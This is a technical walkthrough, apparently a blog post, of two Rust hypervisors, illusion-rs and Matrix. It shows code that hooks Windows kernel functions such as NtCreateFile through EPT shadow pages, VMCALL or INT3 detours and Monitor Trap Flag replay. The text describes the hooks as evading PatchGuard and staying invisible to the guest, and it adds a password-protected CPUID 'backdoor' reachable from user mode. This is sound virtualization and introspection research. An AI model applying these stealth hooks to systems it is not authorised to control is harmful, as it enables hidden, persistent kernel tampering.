We pass the MSR value to set_kernel_base_and_size, which internally calls get_image_base_address to scan memory backwards for the MZ (IMAGE_DOS_SIGNATURE) header. It then uses pa_from_va_with_current_cr3 to translate the virtual base address to a physical address using the guest’s CR3, and finally calls get_size_of_image to retrieve the size of ntoskrnl.exe from the OptionalHeader.SizeOfImage field. These operations are inherently unsafe, so it’s crucial that the correct values are passed in - otherwise, they may lead to a system crash.

Code Reference (hook_manager.rs)

self.ntoskrnl_base_va = unsafe { get_image_base_address(guest_va)? };
self.ntoskrnl_base_pa = PhysicalAddress::pa_from_va_with_current_cr3(self.ntoskrnl_base_va)?;
self.ntoskrnl_size = unsafe { get_size_of_image(self.ntoskrnl_base_pa as _).ok_or(HypervisorError::FailedToGetKernelSize)? } as u64;

Detecting When SSDT Is Loaded Inside ntoskrnl.exe

Before performing EPT-based hooks on kernel functions like NtCreateFile, it is important to ensure that the System Service Descriptor Table (SSDT) has been fully initialized by the Windows kernel. Otherwise, a race condition is introduced: if hooks are applied too early, there’s a risk of targeting invalid memory when the hypervisor attempts to resolve function addresses via syscall numbers through the SSDT - a fallback used only when the function is missing from ntoskrnl.exe’s export table. This can result in a system crash. Analysis of execution paths inside ntoskrnl.exe revealed a reliable point after SSDT initialization, but still early enough in kernel setup to monitor other software invoking those functions.

Analysis of KiInitializeKernel - the core routine responsible for initializing the kernel on each processor - shows that it finalizes the SSDT by invoking KeCompactServiceTable. From this point onward, it becomes safe to install hooks. However, a reliable and repeatable trigger is still needed - ideally, any unconditional VM-exit that occurs shortly after KeCompactServiceTable is called.

Call to KeCompactServiceTable and KiSetCacheInformation Figure 2: KeCompactServiceTable() and KiSetCacheInformation() observed in KiInitializeKernel() using Binary Ninja, confirming the post-SSDT call sequence.

This is where KiSetCacheInformation becomes useful. It is invoked immediately after SSDT setup and triggers a well-defined sequence that includes CPUID instructions. On Intel CPUs, KiSetCacheInformation calls KiSetStandardizedCacheInformation, which begins issuing cpuid(4, 0) to query cache topology. The CPUID instruction unconditionally causes a VM-exit on Intel processors, and may cause a VM-exit on AMD processors depending on the intercept configuration, offering a reliable and deterministic point to synchronize EPT hook installation. This makes CPUID a convenient instruction to synchronize state transitions or trigger early hypervisor logic without guest cooperation.

Intel and AMD call paths into KiSetStandardizedCacheInformation with CPUID Figure 3: KiSetCacheInformation() and KiSetCacheInformationAmd() observed in Binary Ninja, both invoking KiSetStandardizedCacheInformation() which executes CPUID after SSDT setup.

Historically, Intel systems used the path KiSetCacheInformation -> KiSetCacheInformationIntel -> KiSetStandardizedCacheInformation. On recent Windows 10 and 11 builds, the intermediate call to KiSetCacheInformationIntel appears to have been removed - KiSetCacheInformation now calls KiSetStandardizedCacheInformation directly on Intel platforms.

On Intel processors, the execution path is reliable (verified via Binary Ninja analysis on Windows 11 build 26100):

KiInitializeKernel
-> KeCompactServiceTable
-> KiSetCacheInformation
-> KiSetStandardizedCacheInformation
-> cpuid(4, 0)

On AMD processors, the path is conditional (verified via Binary Ninja analysis on Windows 11 build 26100):

  • If bit 22 (TopologyExtensions) in CPUID(0x80000001).ECX is set:
KiInitializeKernel
-> KeCompactServiceTable
-> KiSetCacheInformation
-> KiSetCacheInformationAmd
-> KiSetStandardizedCacheInformation
-> cpuid(0x8000001D, 0)

This bit indicates that the processor supports CPUID(0x8000001D), which enumerates cache and topology info in a standardized way. If unset, the OS must fall back to 0x80000005 / 0x80000006.

  • Otherwise (fallback path without TopologyExtensions support):
KiInitializeKernel
-> KeCompactServiceTable
-> KiSetCacheInformation
-> KiSetCacheInformationAmd
-> cpuid(0x80000005) and cpuid(0x80000006)

Although cpuid(4, 0) on Intel and cpuid(0x8000001D, 0) on AMD are executed shortly after SSDT setup in tested Windows builds, this hypervisor uses cpuid(2, 0) instead. This was a mistake carried over from early development - cpuid(0x2) is not part of the same KiSetCacheInformation() path and isn’t a deterministic indicator of SSDT completion. It happened to fire reliably during boot on test systems, which made it “good enough” at the time. Since the project is no longer actively maintained, the code was left as-is - but for anyone adapting this for production use, hooking cpuid(4, 0) or cpuid(0x8000001D) is the correct path.

Setting Up EPT Hooks (handle_cpuid())

The CPUID instruction executes multiple times during early boot, which can lead to redundant VM-exits. To avoid repeated hook setup, the hypervisor uses a has_cpuid_cache_info_been_called flag. The hook only needs to run once, after SSDT initialization, making this a straightforward and stable timing marker.

Code Reference (cpuid.rs)

match leaf {
    leaf if leaf == CpuidLeaf::CacheInformation as u32 => {
        trace!("CPUID leaf 0x2 detected (Cache Information).");
        if !hook_manager.has_cpuid_cache_info_been_called {
            hook_manager.manage_kernel_ept_hook(
                vm,
                crate::windows::nt::pe::djb2_hash("NtCreateFile".as_bytes()),
                0x0055,
                crate::intel::hooks::hook_manager::EptHookType::Function(
                    crate::intel::hooks::inline::InlineHookType::Vmcall
                ),
                true,
            )?;
            hook_manager.has_cpuid_cache_info_been_called = true;
        }
    }
}

This ensures that we only apply our EPT function hook after the SSDT has been initialized and guarantees that subsequent CPUID calls won’t re-trigger the hook logic.

Resolving Targets and Dispatching Hooks (manage_kernel_ept_hook())

Let’s break down what the manage_kernel_ept_hook function does. It manages the installation or removal of an Extended Page Table (EPT) hook on a target kernel function, such as NtCreateFile.

The logic is straightforward: given a hashed function name and a syscall number, it first tries to resolve the function’s virtual address using get_export_by_hash, which checks the export table of ntoskrnl.exe. If that fails, it falls back to resolving the function using its syscall number through the System Service Descriptor Table (SSDT).

If enable == true, it calls ept_hook_function(), which installs the hook by shadowing the guest memory and modifying EPT permissions - more on this later. If enable == false, it calls ept_unhook_function() to restore the original mapping and unhook the function.

Code Reference (hook_manager.rs)

pub fn manage_kernel_ept_hook(
    &mut self,
    vm: &mut Vm,
    function_hash: u32,
    syscall_number: u16,
    ept_hook_type: EptHookType,
    enable: bool,
) -> Result<(), HypervisorError> {
    let action = if enable { "Enabling" } else { "Disabling" };
    debug!("{} EPT hook for function: {:#x}", action, function_hash);

    trace!("Ntoskrnl base VA: {:#x}", self.ntoskrnl_base_va);
    trace!("Ntoskrnl base PA: {:#x}", self.ntoskrnl_base_pa);
    trace!("Ntoskrnl size: {:#x}", self.ntoskrnl_size);

    let function_va = unsafe {
        if let Some(va) = get_export_by_hash(self.ntoskrnl_base_pa as _, self.ntoskrnl_base_va as _, function_hash) {
            va
        } else {
            let ssdt_function_address =
                SsdtHook::find_ssdt_function_address(syscall_number as _, false, self.ntoskrnl_base_pa as _, self.ntoskrnl_size as _);
            match ssdt_function_address {
                Ok(ssdt_hook) => ssdt_hook.guest_function_va as *mut u8,
                Err(_) => return Err(HypervisorError::FailedToGetExport),
            }
        }
    };

    if enable {
        self.ept_hook_function(vm, function_va as _, function_hash, ept_hook_type)?;
    } else {
        self.ept_unhook_function(vm, function_va as _, ept_hook_type)?;
    }

    Ok(())
}

Second-Level Address Translation (SLAT): EPT (Intel) and NPT (AMD)

Before we get into the specifics of syscall hooks and memory interception, it’s worth covering how this all works under the hood - especially for readers who aren’t already familiar with memory virtualization.

Second-Level Address Translation (SLAT) - also known as nested paging - is a hardware virtualization feature that allows the hypervisor to define a second layer of page translation. The CPU then uses this hypervisor-defined mapping to translate guest physical addresses to host physical addresses without requiring software intervention on each memory access. Second-Level Address Translation (SLAT) introduces an additional layer of address translation between guest physical addresses (GPAs) and host physical addresses (HPAs).

The guest OS configures its own page tables to translate guest virtual addresses (GVAs) to guest physical addresses (GPAs), while the hypervisor configures extended or nested page tables (e.g., EPT or NPT) to translate those GPAs to HPAs. Both stages are carried out by the hardware MMU during memory access, not by software.

The two most common SLAT implementations are Intel’s Extended Page Tables (EPT) under VT-x, and AMD’s Nested Page Tables (NPT) under SVM. These technologies allow guest operating systems to manage their own page tables independently, while the hypervisor handles the second level of memory translation.

To illustrate the first stage of this process - from guest virtual address (GVA) to guest physical address (GPA) - the diagram below shows how a 48-bit x64 virtual address is resolved using traditional paging inside the guest. This is exactly what the guest OS configures, regardless of whether SLAT is enabled.

x64 Virtual Address Translation Figure 4: Traditional x64 virtual address translation as performed by the guest OS (source: Guided Hacking, YouTube)

EPT Hooking Overview (build_identity())

When the hypervisor starts, it sets up Extended Page Tables (EPT) to create a 1:1 identity map - guest physical addresses are mapped directly to the same host physical addresses. This identity mapping allows the guest to run normally, while the hypervisor controls memory access at the page level without interfering with the guest’s own page tables.

The function responsible for setting this up is build_identity(). The first 2MB of memory is mapped using 4KB EPT page tables. All remaining guest physical addresses are mapped using 2MB large pages, unless finer granularity is required - such as when placing hooks.

While it’s also possible to use 1GB pages, illusion-rs opts for 2MB mappings to simplify EPT management and ensure compatibility with platforms like VMware, which do not support 1GB EPT pages. Since Illusion was tested under VMware, 2MB pages were the most practical choice for early boot introspection and syscall hooking.

Code Reference (ept.rs)

/// Represents the entire Extended Page Table structure.
///
/// EPT is a set of nested page tables similar to the standard x86-64 paging mechanism.
/// It consists of 4 levels: PML4, PDPT, PD, and PT.
///
/// Reference: Intel® 64 and IA-32 Architectures Software Developer's Manual: 29.3.2 EPT Translation Mechanism
#[repr(C, align(4096))]
pub struct Ept {
    /// Page Map Level 4 (PML4) Table.
    pml4: Pml4,
    /// Page Directory Pointer Table (PDPT).
    pdpt: Pdpt,
    /// Array of Page Directory Table (PDT).
    pd: [Pd; 512],
    /// Page Table (PT).
    pt: Pt,
}

pub fn build_identity(&mut self) -> Result<(), HypervisorError> {
    let mut mtrr = Mtrr::new();
    trace!("{mtrr:#x?}");
    trace!("Initializing EPTs");

    let mut pa = 0u64;

    self.pml4.0.entries[0].set_readable(true);
    self.pml4.0.entries[0].set_writable(true);
    self.pml4.0.entries[0].set_executable(true);
    self.pml4.0.entries[0].set_pfn(addr_of!(self.pdpt) as u64 >> BASE_PAGE_SHIFT);

    for (i, pdpte) in self.pdpt.0.entries.iter_mut().enumerate() {
        pdpte.set_readable(true);
        pdpte.set_writable(true);
        pdpte.set_executable(true);
        pdpte.set_pfn(addr_of!(self.pd[i]) as u64 >> BASE_PAGE_SHIFT);

        for pde in &mut self.pd[i].0.entries {
            if pa == 0 {
                pde.set_readable(true);
                pde.set_writable(true);
                pde.set_executable(true);
                pde.set_pfn(addr_of!(self.pt) as u64 >> BASE_PAGE_SHIFT);

                for pte in &mut self.pt.0.entries {
                    let memory_type = mtrr
                        .find(pa..pa + BASE_PAGE_SIZE as u64)
                        .ok_or(HypervisorError::MemoryTypeResolutionError)?;
                    pte.set_readable(true);
                    pte.set_writable(true);
                    pte.set_executable(true);
                    pte.set_memory_type(memory_type as u64);
                    pte.set_pfn(pa >> BASE_PAGE_SHIFT);
                    pa += BASE_PAGE_SIZE as u64;
                }
            } else {
                let memory_type = mtrr
                    .find(pa..pa + LARGE_PAGE_SIZE as u64)
                    .ok_or(HypervisorError::MemoryTypeResolutionError)?;

                pde.set_readable(true);
                pde.set_writable(true);
                pde.set_executable(true);
                pde.set_memory_type(memory_type as u64);
                pde.set_large(true);
                pde.set_pfn(pa >> BASE_PAGE_SHIFT);
                pa += LARGE_PAGE_SIZE as u64;
            }
        }
    }

    Ok(())
}

This identity map is later used when installing EPT hooks. It allows the hypervisor to shadow guest memory, modify EPT permissions (like making a page execute-only), and safely redirect execution to hook logic - all without modifying guest memory directly.

Installing the Hook Payload (ept_hook_function())

The ept_hook_function() is the heart of the EPT-based function hooking logic in Illusion. This is where a selected guest function is shadowed, modified, and hooked - all without touching the original memory. Execution is redirected by changing EPT permissions to point to a modified shadow page instead of the original, allowing introspection and control without altering guest state.

This section explains what the function does, which internal calls it makes, and why each step is necessary. Steps 1 through Step 9 correspond to the diagram shown earlier in the article.

Code Reference (hook_manager.rs)

Mapping the Large Page (map_large_page_to_pt())

We begin by ensuring the 2MB large page that contains the target function is registered in the hypervisor’s internal memory management structures. The illusion-rs hypervisor operates with a 1:1 identity mapping between Guest Physical Addresses (GPA) and Host Physical Addresses (HPA), but before any manipulation or permission control can occur, we must first associate this large page with a pre-allocated page table.

These pre-allocated page tables are not allocated dynamically at runtime - instead, a fixed-size pool is reserved at hypervisor startup as part of a pre-allocated heap defined by the user. This memory is shared across all logical processors and is used to back internal structures such as shadow pages and page tables. The heap uses a linked list-based allocator (similar to a classic free-list strategy, not slab or buddy), with allocations performed from a contiguous block of memory (defaulting to 64MB). While the exact number of supported allocations depends on user-defined sizing and workload patterns, all allocations are strictly bounded. If the pool is exhausted, further allocations will fail at the point of use, likely triggering a panic unless explicitly handled.

By calling map_large_page_to_pt(), we link the GPA of the large page to a known internal structure, allowing for controlled splitting, shadowing, and permission enforcement. This also makes it easier to track and restore the original page mappings when hooks need to be removed or toggled later.

self.memory_manager.map_large_page_to_pt(guest_large_page_pa.as_u64())?;

Step 1 - Splitting the Page (is_large_page() -> split_2mb_to_4kb())

When a target function resides within a 2MB large page, changing its permissions would affect the entire region - potentially disrupting unrelated code and triggering VM-exits across the full range. To avoid this, we check if the region is backed by a large page and, if so, split it into 512 individual 4KB entries using a pre-allocated page table. This provides the fine-grained control necessary for isolated function hooking, ensuring only the targeted page generates VM-exits.

if vm.primary_ept.is_large_page(guest_page_pa.as_u64()) {
    let pre_alloc_pt = self
        .memory_manager
        .get_page_table_as_mut(guest_large_page_pa.as_u64())
        .ok_or(HypervisorError::PageTableNotFound)?;

    vm.primary_ept.split_2mb_to_4kb(guest_large_page_pa.as_u64(), pre_alloc_pt)?;
}

Shadowing the Page (is_guest_page_processed() -> map_guest_to_shadow_page())

Before installing any detours, we first check whether a shadow page has already been allocated and mapped for the target guest page. If a mapping already exists, it means this page was previously processed and no further action is needed. Otherwise, we pull a shadow page from our pre-allocated pool and associate it with the guest page using map_guest_to_shadow_page(). This ensures hooks aren’t redundantly reinstalled and prevents multiple shadow pages from being created for the same target. It’s essential for correctness: when a VM-exit occurs due to an EPT violation, we must be able to reliably retrieve the shadow page associated with the faulting guest page.

if !self.memory_manager.is_guest_page_processed(guest_page_pa.as_u64()) {
    self.memory_manager.map_guest_to_shadow_page(
        guest_page_pa.as_u64(),
        guest_function_va,
        guest_function_pa.as_u64(),
        ept_hook_type,
        function_hash,
    )?;
}

Step 2 - Cloning the Code (unsafe_copy_guest_to_shadow())

Once the shadow page has been allocated and mapped, we clone the guest’s original 4KB page into it using unsafe_copy_guest_to_shadow(). This creates a byte-for-byte replica of the guest memory that we can safely modify. Because we perform all modifications in this isolated shadow copy - rather than directly in guest memory - we avoid detection by integrity verification checks like PatchGuard and preserve the original code for future restoration.

let shadow_page_pa = PAddr::from(
    self.memory_manager
        .get_shadow_page_as_ptr(guest_page_pa.as_u64())
        .ok_or(HypervisorError::ShadowPageNotFound)?,
);

Self::unsafe_copy_guest_to_shadow(guest_page_pa, shadow_page_pa);

Step 3 - Installing the Inline Hook

Once the shadow page is prepared, we compute the exact offset where the target function resides relative to the start of the page. This ensures the hook is applied at the correct instruction boundary. At that offset, we insert an inline detour - typically using a VMCALL opcode - which causes a controlled VM-exit whenever the hooked function is executed. This redirection is handled entirely within the hypervisor.

Traditional JMP-based hooks are avoided here because the hypervisor operates outside the guest’s address space in a UEFI context. While it is technically possible to inject hook logic into guest memory (as explored in early versions of illusion-rs), the EPT + VMCALL approach was chosen to keep logic fully on the host side and as a learning experience. For more background on the guest-assisted design, see Appendix: Guest-Assisted Hooking Model.

let shadow_function_pa = PAddr::from(Self::calculate_function_offset_in_host_shadow_page(shadow_page_pa, guest_function_pa));

InlineHook::new(shadow_function_pa.as_u64() as *mut u8, inline_hook_type).detour64();

Step 4 - Revoking Execute Rights (modify_page_permissions())

To ensure our detour is triggered, we revoke execute permissions on the guest’s original page via the EPT. This causes any instruction fetch from that page to generate a VM-exit due to an EPT violation. The hypervisor can then handle this event and reroute execution to the shadow page where our hook is installed. Importantly, we retain read and write permissions on the original page to maintain system stability and avoid triggering protection features like PatchGuard.

vm.primary_ept.modify_page_permissions(
    guest_page_pa.as_u64(),
    AccessType::READ_WRITE,
    pre_alloc_pt,
)?;

Step 5 - Invalidating TLB and EPT Caches (invept_all_contexts())

Once the execute permission is removed from the original guest page and replaced with a shadowed hook, the CPU’s internal caches may still contain stale translations. To ensure the updated EPT mappings take effect immediately, the hypervisor flushes the virtualization translation caches using the INVEPT instruction.

invept_all_contexts();

This call performs an All Contexts invalidation, instructing the CPU to discard all EPT-derived translations for the current EPT pointer (EPTP). Per Intel’s SDM, this ensures that stale mappings are removed regardless of any associated VPID or PCID values.

Because EPT translations are cached per logical processor, INVEPT must be executed on each vCPU, regardless of whether the hypervisor uses shared or per-core EPTs. Without proper synchronization, race conditions may occur during thread migration or instruction replay, potentially leading to stale mappings and inconsistent hook behavior across cores.

INVVPID is not necessary here. It’s used to invalidate guest-virtual mappings tied to VPIDs, which is unrelated to EPT-based translation. For our use case - modifying guest-physical EPT mappings - INVEPT alone is sufficient.

This step completes the hook installation pipeline. From this point forward, the guest kernel continues to operate normally, but any attempt to execute the hooked function will trigger an EPT violation, allowing the hypervisor to intercept the execution path - all without modifying guest memory.

Step 6 and 7 - Catching Execution with EPT Violations (handle_ept_violation())

After an EPT violation VM-exit occurs, the first step is identifying which page triggered the fault. We read the faulting Guest Physical Address (GPA) from the VMCS and align it to the 4KB and 2MB page boundaries. This lets us resolve which specific page was accessed and prepares us to look it up in the shadow page tracking structures.

Code Reference (ept_violation.rs)

let guest_pa = vmread(vmcs::ro::GUEST_PHYSICAL_ADDR_FULL);
let guest_page_pa = PAddr::from(guest_pa).align_down_to_base_page();
let guest_large_page_pa = guest_page_pa.align_down_to_large_page();

Once we have the faulting guest page address, we retrieve the corresponding shadow page that was previously mapped and prepared during hook installation. This page contains our modified copy of the function with a VMCALL detour inserted. Shadow page lookup failures indicate unexpected guest behavior - such as an EPT execute violation without a corresponding shadow mapping - and are treated as fatal errors. If no shadow page is found for the faulting guest page, it likely indicates an unexpected EPT violation not associated with an installed hook. In illusion-rs, this condition is treated as a fatal error and terminates VM-exit handling. In a production-grade hypervisor, such cases should be logged and handled more gracefully to detect guest misbehavior, memory tampering, or logic errors in hook tracking.

let shadow_page_pa = PAddr::from(
    hook_manager
        .memory_manager
        .get_shadow_page_as_ptr(guest_page_pa.as_u64())
        .ok_or(HypervisorError::ShadowPageNotFound)?
);

Before deciding how to respond, we inspect the cause of the violation by reading the EXIT_QUALIFICATION field. This tells us what kind of access the guest attempted - whether it was trying to read, write, or execute memory - and lets us act accordingly.

let exit_qualification_value = vmread(vmcs::ro::EXIT_QUALIFICATION);
let ept_violation_qualification = EptViolationExitQualification::from_exit_qualification(exit_qualification_value);

If the violation indicates an attempt to execute a non-executable page (i.e., it’s readable and writable but not executable), we swap in our shadow page and mark it as execute-only. This redirects execution to our tampered memory, where the inline hook (e.g., VMCALL) resides, allowing the hypervisor to take control.

if ept_violation_qualification.readable && ept_violation_qualification.writable && !ept_violation_qualification.executable {
    vm.primary_ept.swap_page(guest_page_pa.as_u64(), shadow_page_pa.as_u64(), AccessType::EXECUTE, pre_alloc_pt)?;
}

This redirection hands execution over to our shadow page - a byte-for-byte clone of the original memory - where the first few instructions have been overwritten with a VMCALL. At this point, guest execution resumes without advancing RIP, meaning the CPU re-executes the same instruction - but now from the shadow page. When the CPU reaches the VMCALL instruction, it triggers another VM-exit. Because we’ve displaced the function’s original prologue, those instructions must later be restored and replayed under Monitor Trap Flag (MTF) single-stepping. In the Matrix Windows kernel driver-based hypervisor, the shadow page contains an INT3 hook that triggers a VM-exit; the hypervisor sets the guest RIP to the hook handler, performs introspection, and then returns execution via a trampoline. In illusion (a UEFI-based hypervisor), EPT + MTF was chosen instead. This allowed execution redirection to occur entirely from host-side logic, as a simpler and educational approach, without requiring guest-mode memory allocation or in-guest control flow setup. (For alternative designs involving guest memory injection, see Appendix: Guest-Assisted Hooking Model.)

Step 8 - Handling VMCALL Hooks (handle_vmcall())

The VMCALL instruction is inserted by our inline hook as the first instruction in the shadowed function. When executed, it causes an unconditional VM-exit, transferring control to the hypervisor. This lets us detect exactly when the guest invokes the hooked function.

Code Reference (vmcall.rs)

We begin by resolving the guest physical page that triggered the VMCALL, and check whether it belongs to a shadow page previously registered by the hook manager. If the page is found in our shadow mapping infrastructure, we know execution originated from a function we’ve hooked. This conditional check ensures we’re handling a legitimate hook-triggered exit before proceeding with further memory transitions and state changes. At this point, we know exactly which function was called, and with full control in the hypervisor, we can inspect its arguments, trace its execution, and introspect guest memory or registers as needed.

let exit_type = if let Some(shadow_page_pa) = hook_manager.memory_manager.get_shadow_page_as_ptr(guest_page_pa.as_u64()) {
    let pre_alloc_pt = hook_manager
        .memory_manager
        .get_page_table_as_mut(guest_large_page_pa.as_u64())
        .ok_or(HypervisorError::PageTableNotFound)?;

After completing any introspection or analysis - such as inspecting arguments, tracing execution, or examining guest memory - in the hypervisor, we begin restoring guest state. Specifically, we swap back the original (unmodified) guest page and temporarily restore READ_WRITE_EXECUTE permissions. This is required to safely execute the instructions that were originally overwritten by our inline VMCALL detour (typically 2 - 5 bytes at the prologue of the target function).

vm.primary_ept.swap_page(guest_page_pa.as_u64(), guest_page_pa.as_u64(), AccessType::READ_WRITE_EXECUTE, pre_alloc_pt)?;

Before enabling MTF, we retrieve the hook metadata and determine how many instructions were displaced by the inline VMCALL. Simply restoring the page and continuing execution would risk a crash - since the prologue was never executed - and leave the function unmonitored. To prevent this, we need to single-step through the displaced instructions using MTF. Before resuming the guest, we initialize a replay counter, set the Monitor Trap Flag (MTF), and disable guest interrupts to prevent unexpected interrupt handling during single-stepping, instruction-by-instruction re-execution. This step sets up the replay process that continues in the next section.

let instruction_count = HookManager::calculate_instruction_count(...);
vm.mtf_counter = Some(instruction_count);
set_monitor_trap_flag(true);
update_guest_interrupt_flag(vm, false)?;

If no shadow mapping is found for the faulting guest page, the VMCALL is assumed to be invalid or executed from an unexpected context. To emulate expected CPU behavior, illusion-rs injects a #UD (undefined instruction) exception, consistent with how the processor handles VMCALL outside VMX operation.

Step 9 - Single-Stepping with Monitor Trap Flag (handle_monitor_trap_flag())

Monitor Trap Flag (MTF) enables the hypervisor to single-step through the instructions that were displaced by the inline VMCALL. Each instruction executed by the guest causes a VM-exit, at which point we decrement the instruction replay counter.

Code Reference (mtf.rs)

*counter = counter.saturating_sub(1);

Execution continues one instruction at a time under hypervisor supervision until all overwritten bytes have been replayed. Once the counter reaches zero, we know the prologue has been fully restored. At this point, we reapply the hook by swapping the shadow page back in and setting it as execute-only, ensuring the next invocation of this function once again triggers a VMCALL.

vm.primary_ept.swap_page(guest_pa.align_down_to_base_page().as_u64(), shadow_page_pa.as_u64(), AccessType::EXECUTE, pre_alloc_pt)?;

Finally, we disable MTF - by simply omitting set_monitor_trap_flag(true) - and re-enable guest interrupts, allowing the guest to resume execution cleanly.

restore_guest_interrupt_flag(vm)?;

This completes the detour cycle. The guest continues uninterrupted, unaware that its control flow was temporarily redirected through our hypervisor.

Catching Read/Write Violations (handle_ept_violation())

Sometimes, the guest may attempt to read or write from a page that’s currently marked as execute-only. Since EPT enforces strict access permissions, this triggers an EPT violation VM-exit - this time due to a read or write on a page that lacks the appropriate permissions.

Code Reference (ept_violation.rs)

if ept_violation_qualification.executable && !ept_violation_qualification.readable && !ept_violation_qualification.writable {
    vm.primary_ept.swap_page(guest_page_pa.as_u64(), guest_page_pa.as_u64(), AccessType::READ_WRITE_EXECUTE, pre_alloc_pt)?;
    vm.mtf_counter = Some(1);
    set_monitor_trap_flag(true);
    update_guest_interrupt_flag(vm, false)?;
}

To handle this safely, we temporarily restore the original guest page with full read, write, and execute access. This ensures the instruction executes successfully - even if it uses RIP-relative addressing or accesses data on the same page - preventing a VM-exit loop, system crashes, or exposure of the hook. We then enable Monitor Trap Flag (MTF) and step forward a single instruction before reapplying the original hook, preserving stealth and stability.

Illusion Execution Trace: Proof-of-Concept Walkthrough

This Proof-of-Concept (PoC) demonstrates how the Illusion hypervisor integrates early boot-time EPT hooking with a user-mode control channel. After initializing the hypervisor from UEFI, a command-line utility communicates using intercepted CPUID instructions to toggle kernel hooks in real-time - without requiring kernel-mode drivers or directly modifying guest virtual or physical memory.

Controlling EPT Hooks via Hypercalls

Before testing the hook logic, we first launch the hypervisor directly from the UEFI shell. This ensures that the hypervisor is loaded at boot and remains isolated from the Windows kernel.

Booting Illusion Hypervisor from UEFI Shell Figure 5: Booting the Illusion hypervisor directly from the UEFI shell

Once loaded, we can issue commands from user-mode using a simple client. This CLI utility interfaces with a password-protected backdoor exposed by the hypervisor. The communication channel is implemented using the CPUID instruction - a widely used and unprivileged x86 instruction that reliably causes a VM-exit when intercepted. Since CPUID is an unprivileged instruction available to user-mode, this allows us to implement stealthy hypercalls without needing any kernel-mode components.

Command-Line Utility Controlling Kernel Hooks Figure 6: Command-line utility controlling kernel hooks via CPUID hypercalls

The client can enable or disable hooks for specific syscall functions (like NtCreateFile) in real-time. This is especially useful for introspection tools where the hook lifecycle must be externally controlled.

The image below demonstrates a live EPT hook in action. On the left, we see the hypervisor logs tracking the hook process: the 2MB page is first associated with a pre-allocated page table, then split into 512 individual 4KB entries. A shadow page is pulled from a pre-allocated pool and mapped to the target guest page. The guest’s original 4KB memory is cloned into the shadow page, a VMCALL inline hook is inserted, and execute permissions are revoked on the original page. This detour is used to trigger a VM-exit when the function executes. On the right, WinDbg confirms that the shadow-mapped address (0xab0c360) correctly contains the VMCALL opcode (0f01c1), and that the original NtCreateFile at 0xfffff8005de16360 remains untouched.

This keeps the hook invisible at the virtual memory level: the original GVA still resolves to the same GPA, but the hypervisor rewires the final mapping to the HPA of the shadow page. From the guest’s typical perspective (unless inspecting physical memory), the memory appears unmodified - yet the hook is live.

Debug Logs and WinDbg Output Demonstrating Stealth EPT Hook Execution Figure 7: Debug logs and WinDbg output demonstrating stealth EPT hook execution

Matrix: Windows Kernel Driver-Based Hypervisor Using Dual EPT

Matrix is a Windows kernel driver-based hypervisor built for runtime introspection and syscall redirection. It was developed before illusion-rs, but explores a different approach: instead of running from firmware, Matrix installs as a Windows driver and operates from kernel mode, leveraging two Extended Page Table (EPT) contexts - one for the original memory and another for shadowed pages that contain hook logic.

Unlike Illusion, which sets up a single EPT and uses MTF-based control at boot, Matrix uses dual EPTs to trap execution dynamically. This allows us to configure execute-only hooks, remap guest pages without modifying them, and control function redirection at runtime. Our implementation toggles between the two EPTs - the primary EPT for normal guest execution, and the secondary EPT for redirected flows - using dynamic EPTP switching triggered by VM-exits. Some hypervisors extend this design by using one, two, three, or more EPTs - for example, maintaining separate EPTs for different execution stages or process contexts. Some implementations also opt for per-logical processor EPT isolation. In contrast, matrix uses a minimal dual-EPT setup shared across all logical processors, focusing on simplicity and testability to demonstrate the core concept.

The diagram below shows how this works in Matrix: original pages lose execute permissions in the primary EPT, and are mirrored in the secondary EPT with EXECUTE-only rights, pointing to trampoline logic in a shadow copy. Runtime execution of the target function triggers a VM-exit, which we use to switch contexts and reroute control to the hook handler.

EPT Hooking Flow Diagram - Illusion Hypervisor Figure 8: Control flow of dual-EPT based function hooking in the Matrix Windows kernel driver-based hypervisor

Each step shown in the diagram is explained in detail in the sections below.

Initializing Primary and Secondary EPTs (virtualize_system())

When our kernel-mode driver is loaded, we initialize virtualization by allocating and identity-mapping (1:1) two separate EPT contexts: one primary and one secondary. Both are initially set up with full READ_WRITE_EXECUTE permissions to mirror guest memory. The primary EPT provides a clean view of guest memory without interference, while the secondary EPT is where we apply shadowed pages for hooks. This dual mapping allows us to selectively redirect execution without touching the original memory, switching between EPTs as needed to trap and analyze function calls.

Code Reference (lib.rs)

primary_ept.identity_2mb(AccessType::READ_WRITE_EXECUTE)?;
secondary_ept.identity_2mb(AccessType::READ_WRITE_EXECUTE)?;

Step 1 and 2 - Creating Shadow Hooks and Setting Up Trampolines (hook_function_ptr())

Before enabling virtualization, we prepare our hooks by resolving target functions and setting up detours. We hook two kernel functions: MmIsAddressValid, resolved from the export table, and NtCreateFile, resolved from the SSDT by syscall number. For each, we create a trampoline to preserve the original prologue and allow clean return after our hook logic executes.

To do this, we copy the page containing the target function into a shadow region, calculate the function’s location within the copied page, and insert an inline INT3 breakpoint to trigger VM-exits. These hooks are added to our internal hook manager and remain dormant until the dual-EPT remapping is configured. While illusion-rs could have used the same approach, it instead uses VMCALL - partly to avoid breakpoint exceptions and partly just to try something different from what was already done in matrix-rs.

let mm_is_address_valid =
    Hook::hook_function("MmIsAddressValid", hook::mm_is_address_valid as *const ())
        .ok_or(HypervisorError::HookError)?;

if let HookType::Function { ref inline_hook } = mm_is_address_valid.hook_type {
    hook::MM_IS_ADDRESS_VALID_ORIGINAL
        .store(inline_hook.trampoline_address(), Ordering::Relaxed);
}

let ssdt_nt_create_file_addy = SsdtHook::find_ssdt_function_address(0x0055, false)?;

let nt_create_file_syscall_hook = Hook::hook_function_ptr(
    ssdt_nt_create_file_addy.function_address as _,
    hook::nt_create_file as *const (),
)
.ok_or(HypervisorError::HookError)?;

if let HookType::Function { ref inline_hook } = nt_create_file_syscall_hook.hook_type {
    hook::NT_CREATE_FILE_ORIGINAL.store(inline_hook.trampoline_address(), Ordering::Relaxed);
}

let hook_manager = HookManager::new(vec![mm_is_address_valid, nt_create_file_syscall_hook]);

We support hook creation using either a function name (hook_function) or a raw pointer (hook_function_ptr). The name-based method resolves a function from the kernel export table, while the pointer-based method is used for syscalls or undocumented routines where we locate the address via the SSDT. Internally, hook_function_ptr clones the 4KB page containing the target function into a shadow region, calculates the function’s offset within that page, and injects an inline INT3 (0xCC) breakpoint to trigger a VM-exit. To safely return to the original logic, FunctionHook::new builds a trampoline - a small stub that restores the overwritten bytes and performs a RIP-relative indirect jump (jmp qword ptr [rip+0]) back to the remainder of the original function. This ensures control flow resumes cleanly after our handler executes, without modifying guest memory.

Code Reference (hooks.rs)

let original_pa = PhysicalAddress::from_va(function_ptr);
let page = Self::copy_page(function_ptr)?;

let page_va = page.as_ptr() as *mut u64 as u64;
